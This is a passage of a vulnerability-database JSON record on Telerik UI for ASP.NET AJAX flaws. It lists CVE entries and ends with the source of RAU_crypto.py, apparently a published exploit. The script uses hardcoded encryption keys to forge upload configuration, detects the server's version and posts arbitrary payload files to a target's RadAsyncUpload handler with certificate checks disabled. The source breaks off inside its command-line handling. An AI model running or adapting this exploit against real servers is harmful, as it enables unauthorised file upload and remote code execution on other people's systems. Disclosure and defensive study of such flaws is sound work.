"baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317"], "modified": "2020-06-05T00:00:00", "id": "AKB:971956B9-232E-41FA-B307-2078E26F310E", "href": "https://attackerkb.com/topics/RlhpFjxJmB/cve-2017-11317", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T22:05:34", "description": "Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-11T13:15:00", "type": "cve", "title": "CVE-2019-18935", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2019-18935"], "modified": "2020-10-20T22:15:00", "cpe": [], "id": "CVE-2019-18935", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-18935", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-07-15T05:49:55", "description": "File upload vulnerability in GFI Mail Archiver versions up to and including 15.1 via insecure implementation of Telerik Web UI plugin which is affected by CVE-2014-2217, and CVE-2017-11317.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-07T21:15:00", "type": "cve", "title": "CVE-2021-29281", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2217", "CVE-2017-11317", "CVE-2021-29281"], "modified": "2022-07-15T02:08:00", "cpe": [], "id": "CVE-2021-29281", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-29281", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T19:47:29", "description": "An issue was discovered in Quest KACE Desktop Authority before 11.2. This vulnerability allows attackers to execute remote code through a deserialization exploitation in the RadAsyncUpload function of ASP.NET AJAX. An attacker can leverage this vulnerability when the encryption keys are known (due to the presence of CVE-2017-11317, CVE-2017-11357, or other means). A default setting for the type whitelisting feature in more current versions of ASP.NET AJAX prevents exploitation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-22T06:15:00", "type": "cve", "title": "CVE-2021-44029", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2021-44029"], "modified": "2022-01-03T20:54:00", "cpe": [], "id": "CVE-2021-44029", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44029", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T13:31:25", "description": "Cross-site scripting (XSS) vulnerability in Telerik UI for ASP.NET AJAX RadEditor control 2014.1.403.35, 2009.3.1208.20, and other versions allows remote attackers to inject arbitrary web script or HTML via CSS expressions in style attributes.", "cvss3": {}, "published": "2014-09-26T21:55:00", "type": "cve", "title": "CVE-2014-4958", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4958"], "modified": "2015-09-16T19:30:00", "cpe": ["cpe:/a:telerik:asp.net_ajax_radeditor_control:2009.3.1208.20", "cpe:/a:telerik:asp.net_ajax_radeditor_control:2014.1.403.35"], "id": "CVE-2014-4958", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4958", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:telerik:asp.net_ajax_radeditor_control:2014.1.403.35:*:*:*:*:*:*:*", "cpe:2.3:a:telerik:asp.net_ajax_radeditor_control:2009.3.1208.20:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T22:19:17", "description": "Path traversal in RadChart in Telerik UI for ASP.NET AJAX allows a remote attacker to read and delete an image with extension .BMP, .EXIF, .GIF, .ICON, .JPEG, .PNG, .TIFF, or .WMF on the server through a specially crafted request. NOTE: RadChart was discontinued in 2014 in favor of RadHtmlChart. All RadChart versions were affected. To avoid this vulnerability, you must remove RadChart's HTTP handler from a web.config (its type is Telerik.Web.UI.ChartHttpHandler).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-13T18:15:00", "type": "cve", "title": "CVE-2019-19790", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19790"], "modified": "2019-12-30T16:59:00", "cpe": ["cpe:/a:telerik:radchart:*", "cpe:/a:telerik:ui_for_asp.net_ajax:-"], "id": "CVE-2019-19790", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19790", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:telerik:ui_for_asp.net_ajax:-:*:*:*:*:*:*:*", "cpe:2.3:a:telerik:radchart:*:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:55:56", "description": "Telerik.Web.UI.dll in Progress Telerik UI for ASP.NET AJAX before R2 2017 SP1 and Sitefinity before 10.0.6412.0 does not properly protect Telerik.Web.UI.DialogParametersEncryptionKey or the MachineKey, which makes it easier for remote attackers to defeat cryptographic protection mechanisms, leading to a MachineKey leak, arbitrary file uploads or downloads, XSS, or ASP.NET ViewState compromise.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-07-03T19:29:00", "type": "cve", "title": "CVE-2017-9248", "cwe": ["CWE-522"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9248"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:telerik:ui_for_asp.net_ajax:2017.2.503", "cpe:/a:telerik:sitefinity_cms:10.0.6401.0"], "id": "CVE-2017-9248", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9248", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:telerik:sitefinity_cms:10.0.6401.0:*:*:*:*:*:*:*", "cpe:2.3:a:telerik:ui_for_asp.net_ajax:2017.2.503:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:33:12", "description": "Telerik.Web.UI in Progress Telerik UI for ASP.NET AJAX before R1 2017 and R2 before R2 2017 SP2 uses weak RadAsyncUpload encryption, which allows remote attackers to perform arbitrary file uploads or execute arbitrary code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-08-23T17:29:00", "type": "cve", "title": "CVE-2017-11317", "cwe": ["CWE-326"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317"], "modified": "2020-10-20T22:15:00", "cpe": ["cpe:/a:telerik:ui_for_asp.net_ajax:2016.3.1027", "cpe:/a:telerik:ui_for_asp.net_ajax:2017.2.503", "cpe:/a:telerik:ui_for_asp.net_ajax:2017.2.621"], "id": "CVE-2017-11317", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11317", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:telerik:ui_for_asp.net_ajax:2016.3.1027:*:*:*:*:*:*:*", "cpe:2.3:a:telerik:ui_for_asp.net_ajax:2017.2.621:*:*:*:*:*:*:*", "cpe:2.3:a:telerik:ui_for_asp.net_ajax:2017.2.503:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:33:38", "description": "Absolute path traversal vulnerability in the RadAsyncUpload control in the RadControls in Telerik UI for ASP.NET AJAX before Q3 2012 SP2 allows remote attackers to write to arbitrary files, and consequently execute arbitrary code, via a full pathname in the UploadID metadata value.", "cvss3": {}, "published": "2014-12-25T21:59:00", "type": "cve", "title": "CVE-2014-2217", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2217"], "modified": "2014-12-29T17:53:00", "cpe": ["cpe:/a:telerik:ui_for_asp.net_ajax:2014.3.1209"], "id": "CVE-2014-2217", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2217", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:telerik:ui_for_asp.net_ajax:2014.3.1209:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:33:59", "description": "Progress Telerik UI for ASP.NET AJAX before R2 2017 SP2 does not properly restrict user input to RadAsyncUpload, which allows remote attackers to perform arbitrary file uploads or execute arbitrary code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-08-23T17:29:00", "type": "cve", "title": "CVE-2017-11357", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11357"], "modified": "2018-01-28T02:29:00", "cpe": ["cpe:/a:telerik:ui_for_asp.net_ajax:2017.2.621"], "id": "CVE-2017-11357", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11357", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:telerik:ui_for_asp.net_ajax:2017.2.621:*:*:*:*:*:*:*"]}], "exploitpack": [{"lastseen": "2020-04-01T19:04:51", "description": "\nTelerik UI for ASP.NET AJAX 2012.3.1308 2017.1.118 - Arbitrary File Upload", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-24T00:00:00", "title": "Telerik UI for ASP.NET AJAX 2012.3.1308 2017.1.118 - Arbitrary File Upload", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357"], "modified": "2018-01-24T00:00:00", "id": "EXPLOITPACK:AC453F09E5BC0D2354DD309296F804BF", "href": "", "sourceData": "# Exploit Title: Telerik UI for ASP.NET AJAX RadAsyncUpload uploader\n# Filename: RAU_crypto.py\n# Github: https://github.com/bao7uo/RAU_crypto\n# Date: 2018-01-23\n\n# Exploit Author: Paul Taylor / Foregenix Ltd\n# Website: http://www.foregenix.com/blog\n\n# Version: Telerik UI for ASP.NET AJAX \n# CVE: CVE-2017-11317, CVE-2017-11357\n# Vendor Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload\n# Vendor Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/insecure-direct-object-reference\n\n# Tested on: Working on versions 2012.3.1308 thru 2017.1.118 (.NET 35, 40, 45)\n\n#!/usr/bin/python3\n\n# Author: Paul Taylor / Foregenix Ltd\n# https://github.com/bao7uo/RAU_crypto/blob/master/RAU_crypto.py\n\n# RAU crypto - Exploiting CVE-2017-11317, CVE-2017-11357\n\n# Telerik Web UI for ASP.NET AJAX\n# RadAsyncUpload hardcoded keys / insecure direct object reference\n# Arbitrary file upload\n\n# Telerik fixed in June 2017 by removing default keys in\n# versions R2 2017 SP1 (2017.2.621) and providing the ability to disable the\n# RadAsyncUpload feature in R2 2017 SP2 (2017.2.711)\n\n# https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload\n# https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/insecure-direct-object-reference\n# http://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security\n\n# http://target/Telerik.Web.UI.WebResource.axd?type=rau\n\nimport sys\nimport base64\nimport json\nimport re\nimport requests\nfrom Crypto.Cipher import AES\nfrom Crypto.Hash import HMAC\nfrom Crypto.Hash import SHA256\n\nimport binascii\n\n# Warning, the below prevents certificate warnings,\n# and verify = False in the later code prevents them being verified\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\n\nclass RAUCipher:\n key = binascii.unhexlify(\"EB8AF90FDE30FECBE330E807CF0B4252\" +\n \"A44E9F06A2EA4AF10B046F598DD3EA0C\")\n iv = binascii.unhexlify(\"E330E807CF0B425255A3A561A707D269\")\n\n def encrypt(plaintext):\n sys.stderr.write(\"Encrypting... \")\n encoded = \"\"\n for i in plaintext:\n encoded = encoded + i + \"\\x00\"\n plaintext = encoded + (\n chr(16 - (len(encoded) % 16)) *\n (16 - (len(encoded) % 16))\n )\n cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv)\n sys.stderr.write(\"done\\n\")\n return base64.b64encode(cipher.encrypt(plaintext)).decode()\n\n def decrypt(ciphertext):\n sys.stderr.write(\"Decrypting... \")\n ciphertext = base64.b64decode(ciphertext)\n cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv)\n unpad = lambda s: s[0:-ord(chr(s[-1]))]\n sys.stderr.write(\"done\\n\")\n return unpad(cipher.decrypt(ciphertext[0:])).decode()[0::2]\n\n def addHmac(string, Version):\n\n isHmacVersion = False\n\n # \"Encrypt-then-MAC\" feature introduced in R1 2017\n # Required for \"2017.1.118\", \"2017.1.228\", \"2017.2.503\"\n\n if \"2017\" in Version:\n isHmacVersion = True\n\n hmac = HMAC.new(\n b'PrivateKeyForHashOfUploadConfiguration',\n bytes(string.encode()),\n SHA256.new()\n )\n hmac = base64.b64encode(hmac.digest()).decode()\n return string + hmac if isHmacVersion else string\n\n\ndef rauPostData_prep(quiet, TempTargetFolder, Version):\n TargetFolder = RAUCipher.addHmac(\n \"jgas0meSrU/uP/TPzrhDTw==\",\n Version\n )\n TempTargetFolder = RAUCipher.addHmac(\n RAUCipher.encrypt(TempTargetFolder),\n Version\n )\n\n rauJSONplaintext = \\\n '{\"TargetFolder\":\"' + TargetFolder + '\",\"TempTargetFolder\":\"' + \\\n TempTargetFolder + \\\n '\",\"MaxFileSize\":0,\"TimeToLive\":{\"Ticks\":1440000000000,\"Days\":0,\"Hours\":40,\"Minutes\":0,\"Seconds\":0,\"Milliseconds\":0,\"TotalDays\":1.6666666666666666,\"TotalHours\":40,\"TotalMinutes\":2400,\"TotalSeconds\":144000,\"TotalMilliseconds\":144000000},\"UseApplicationPoolImpersonation\":false}'\n if not quiet:\n print(\"JSON: \" + rauJSONplaintext + \"\\n\")\n rauPostData = RAUCipher.encrypt(rauJSONplaintext) + \"&\"\n rauVersionplaintext = \\\n \"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=\" + \\\n Version + \\\n \", Culture=neutral, PublicKeyToken=121fae78165ba3d4\"\n if not quiet:\n print(\"Version: \" + rauVersionplaintext + \"\\n\")\n rauPostData += RAUCipher.encrypt(rauVersionplaintext)\n return rauPostData\n\n\ndef getVersion(url):\n sys.stderr.write(\"Contacting server... \")\n response = requests.get(url, verify=False)\n html = response.text\n sys.stderr.write(\"done\\n\")\n match = re.search(\n '((?<=\\<\\!-- )20\\d{2}(.\\d+)+(?= --\\>))|' +\n '(?<=Version%3d)20\\d{2}(.\\d+)+(?=%2c)|' +\n '(?<=Version=)20\\d{2}(.\\d+)+(?=,)',\n html\n )\n\n if match:\n return match.group(0)\n else:\n return \"No version result\"\n\n\ndef payload(TempTargetFolder, Version, payload_filename):\n sys.stderr.write(\"file: \" + payload_filename + \"\\n\")\n sys.stderr.write(\"version: \" + Version + \"\\n\")\n sys.stderr.write(\"destination \" + TempTargetFolder + \"\\n\")\n sys.stderr.write(\"Preparing payload... \\n\")\n payload_file = open(payload_filename, \"r\")\n payload_file_data = payload_file.read()\n payload_file.close()\n quiet = True\n\n data = \"-----------------------------68821516528156\\r\\n\"\n data += \"Content-Disposition: form-data; name=\\\"rauPostData\\\"\\r\\n\"\n data += \"\\r\\n\"\n data += rauPostData_prep(quiet, TempTargetFolder, Version) + \"\\r\\n\"\n data += \"-----------------------------68821516528156\\r\\n\"\n data += \"Content-Disposition: form-data; name=\\\"file\\\"; filename=\\\"blob\\\"\\r\\n\"\n data += \"Content-Type: application/octet-stream\\r\\n\"\n data += \"\\r\\n\"\n data += payload_file_data\n data += \"-----------------------------68821516528156\\r\\n\"\n data += \"Content-Disposition: form-data; name=\\\"fileName\\\"\\r\\n\"\n data += \"\\r\\n\"\n data += \"RAU_crypto.bypass\\r\\n\"\n data += \"-----------------------------68821516528156\\r\\n\"\n data += \"Content-Disposition: form-data; name=\\\"contentType\\\"\\r\\n\"\n data += \"\\r\\n\"\n data += \"text/html\\r\\n\"\n data += \"-----------------------------68821516528156\\r\\n\"\n data += \"Content-Disposition: form-data; name=\\\"lastModifiedDate\\\"\\r\\n\"\n data += \"\\r\\n\"\n data += \"2017-06-28T09:11:28.586Z\\r\\n\"\n data += \"-----------------------------68821516528156\\r\\n\"\n data += \"Content-Disposition: form-data; name=\\\"metadata\\\"\\r\\n\"\n data += \"\\r\\n\"\n data += \"{\\\"TotalChunks\\\":1,\\\"ChunkIndex\\\":0,\\\"TotalFileSize\\\":1,\\\"UploadID\\\":\\\"\" + \\\n payload_filename + \"\\\"}\\r\\n\"\n data += \"-----------------------------68821516528156--\\r\\n\"\n data += \"\\r\\n\"\n sys.stderr.write(\"Payload prep done\\n\")\n return data\n\n\ndef upload(TempTargetFolder, Version, payload_filename, url):\n sys.stderr.write(\"Preparing to upload to \" + url + \"\\n\")\n session = requests.Session()\n request = requests.Request(\n 'POST',\n url,\n data=payload(\n TempTargetFolder,\n Version,\n payload_filename\n )\n )\n request = request.prepare()\n request.headers[\"Content-Type\"] = \\\n \"multipart/form-data; \" +\\\n \"boundary=---------------------------68821516528156\"\n response = session.send(request, verify=False)\n sys.stderr.write(\"Upload done\\n\")\n return response.text\n\n\ndef decode_rauPostData(rauPostData):\n rauPostData = rauPostData.split(\"&\")\n rauJSON = RAUCipher.decrypt(rauPostData[0])\n decoded = \"\\nJSON: \" + rauJSON + \"\\n\"\n TempTargetFolder = json.loads(rauJSON)[\"TempTargetFolder\"]\n decoded = decoded + \"\\nTempTargetFolder = \" + \\\n RAUCipher.decrypt(TempTargetFolder) + \"\\n\"\n rauVersion = RAUCipher.decrypt(rauPostData[1])\n decoded = decoded + \"\\nVersion: \" + rauVersion + \"\\n\"\n return decoded\n\n\ndef mode_decrypt():\n # decrypt ciphertext\n ciphertext = sys.argv[2]\n print(\"\\n\" + RAUCipher.decrypt(ciphertext) + \"\\n\")\n\n\ndef mode_Decrypt_rauPostData():\n # decrypt rauPostData\n rauPostData = sys.argv[2]\n print(decode_rauPostData(rauPostData))\n\n\ndef mode_encrypt():\n # encrypt plaintext\n plaintext = sys.argv[2]\n print(\"\\n\" + RAUCipher.encrypt(plaintext) + \"\\n\")\n\n\ndef mode_Encrypt_rauPostData():\n # encrypt rauPostData based on TempTargetFolder and Version\n quiet = False\n TempTargetFolder = sys.argv[2]\n Version = sys.argv[3]\n print(\n \"rauPostData: \" +\n rauPostData_prep(quiet, TempTargetFolder, Version) +\n \"\\n\"\n )\n\n\ndef mode_encrypt_rauPostData_Quiet():\n # as per -E but just output encrypted rauPostData,\n # not the prepared JSON and version\n quiet = True\n TempTargetFolder = sys.argv[2]\n Version = sys.argv[3]\n print(rauPostData_prep(quiet, TempTargetFolder, Version))\n\n\ndef mode_version():\n # extract Telerik web ui version details from url\n url = sys.argv[2]\n print(getVersion(url))\n\n\ndef mode_payload():\n # generate a payload based on TempTargetFolder, Version and payload file\n TempTargetFolder = sys.argv[2]\n Version = sys.argv[3]\n payload_filename = sys.argv[4]\n print(payload(TempTargetFolder, Version, payload_filename))\n\n\ndef mode_Post():\n # generate and upload a payload based on\n # TempTargetFolder, Version, payload file and url\n TempTargetFolder = sys.argv[2]\n Version = sys.argv[3]\n payload_filename = sys.argv[4]\n url = sys.argv[5]\n print(upload(TempTargetFolder, Version, payload_filename, url))\n\n\ndef mode_help():\n print(\n \"Usage:\\n\" +\n \"\\n\" +\n \"Decrypt a plaintext: -d ciphertext\\n\" +\n \"Decrypt rauPostData: -D rauPostData\\n\" +\n \"Encrypt a plaintext: -e plaintext\\n\" +\n \"Gen rauPostData: -E TempTargetFolder Version\\n\" +\n \"Gen rauPostData (quiet): -Q TempTargetFolder Version\\n\" +\n \"Version in HTTP response: -v url\\n\" +\n \"Generate a POST payload: -p TempTargetFolder Version c:\\\\\\\\folder\\\\\\\\filename\\n\" +\n \"Upload a payload: -P TempTargetFolder Version c:\\\\\\\\folder\\\\\\\\filename url\\n\\n\"\n \"Example URL: http://target/Telerik.Web.UI.WebResource.axd?type=rau\"\n )\n\n\nsys.stderr.write(\"\\nRAU_crypto by Paul Taylor / Foregenix Ltd.\\n\")\nsys.stderr.write(\n \"CVE-2017-11317 - \" +\n \"Telerik RadAsyncUpload hardcoded keys / arbitrary file upload\\n\\n\"\n )\n\nif len(sys.argv) < 2:\n mode_help()\nelif sys.argv[1] == \"-d\" and len(sys.argv) == 3:\n mode_decrypt()\nelif sys.argv[1] == \"-D\" and len(sys.argv) == 3:\n mode_Decrypt_rauPostData()\nelif sys.argv[1] == \"-e\" and len(sys.argv) == 3:\n mode_encrypt()\nelif sys.argv[1] == \"-E\" and 